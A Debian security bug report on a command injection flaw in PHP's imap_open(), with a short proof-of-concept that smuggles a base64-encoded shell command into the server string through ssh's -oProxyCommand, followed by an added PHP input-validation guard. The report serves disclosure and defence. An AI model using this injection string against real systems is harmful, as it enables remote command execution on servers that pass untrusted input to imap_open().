Package: php-imap
Version: 1:7.0+49
Severity: grave
Tags: security
Justification: user security hole

Dear Maintainer,

A command injection vulnerability has been identified in the imap extension of PHP. It is located in the imap_open() function, which does not correctly validate the server URI. imap_open() invokes rsh, which is symlinked to ssh on Debian; this results in a possible command injection via the "-o ProxyCommand" option of ssh.

A PoC is available:

```
<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
```

- Bo0om : PHP_imap_open_exploit
  https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
- Antichat : [спущено с LVL8] RCE Task #3
  https://antichat.com/threads/463395/#post-4254681

-- System Information:
Debian Release: 9.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8), LANGUAGE=en_US:en (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages php-imap depends on:
ii  php-common   1:49
ii  php7.0-imap  7.0.30-0+deb9u1

php-imap recommends no packages.

php-imap suggests no packages.

-- no debconf information
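
An application-side guard for the server-URI validation the report says imap_open() lacks, as an added example that is not part of the original report or of PHP itself. The helper name safe_mailbox(), the sample host names and the conservative folder check are assumptions made for illustration; /norsh is the documented imap_open() mailbox flag that stops c-client from trying rsh or ssh.

```php
<?php
// Added example: build the imap_open() mailbox string only from validated parts,
// so the server portion can never carry an ssh option such as -oProxyCommand.
// safe_mailbox() is a hypothetical helper, not a PHP or c-client function.

function safe_mailbox(string $host, int $port = 143, string $folder = 'INBOX'): string
{
    // Host name or dotted IPv4 literal only. Every label must start and end with
    // an alphanumeric, so a leading "-" is impossible, and whitespace, "=", "|",
    // "/", "{" and "}" can never match.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $hostPattern = '/\A' . $label . '(?:\.' . $label . ')*\z/';
    if (strlen($host) > 253 || !preg_match($hostPattern, $host)) {
        throw new InvalidArgumentException('invalid IMAP host');
    }
    if ($port < 1 || $port > 65535) {
        throw new InvalidArgumentException('invalid IMAP port');
    }
    // Conservative folder check (assumption): no braces, no control characters.
    if ($folder === '' || preg_match('/[{}\x00-\x1f\x7f]/', $folder)) {
        throw new InvalidArgumentException('invalid folder name');
    }
    // /norsh: do not use rsh or ssh to establish a preauthenticated IMAP session.
    return sprintf('{%s:%d/imap/norsh}%s', $host, $port, $folder);
}

// Constructed inputs: an ordinary host, and two strings with the same shape as
// the server value in the report (embedded whitespace, option-style prefix).
$candidates = [
    'mail.example.org',
    "x -oExampleOption=placeholder",
    "-oExampleOption=placeholder",
];

foreach ($candidates as $candidate) {
    try {
        // In real use: imap_open(safe_mailbox($host), $user, $password)
        echo 'accepted: ', safe_mailbox($candidate), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', json_encode($candidate), ' (', $e->getMessage(), ")\n";
    }
}
```

The script does not call imap_open(), so it runs without the imap extension installed; only the first constructed host is accepted.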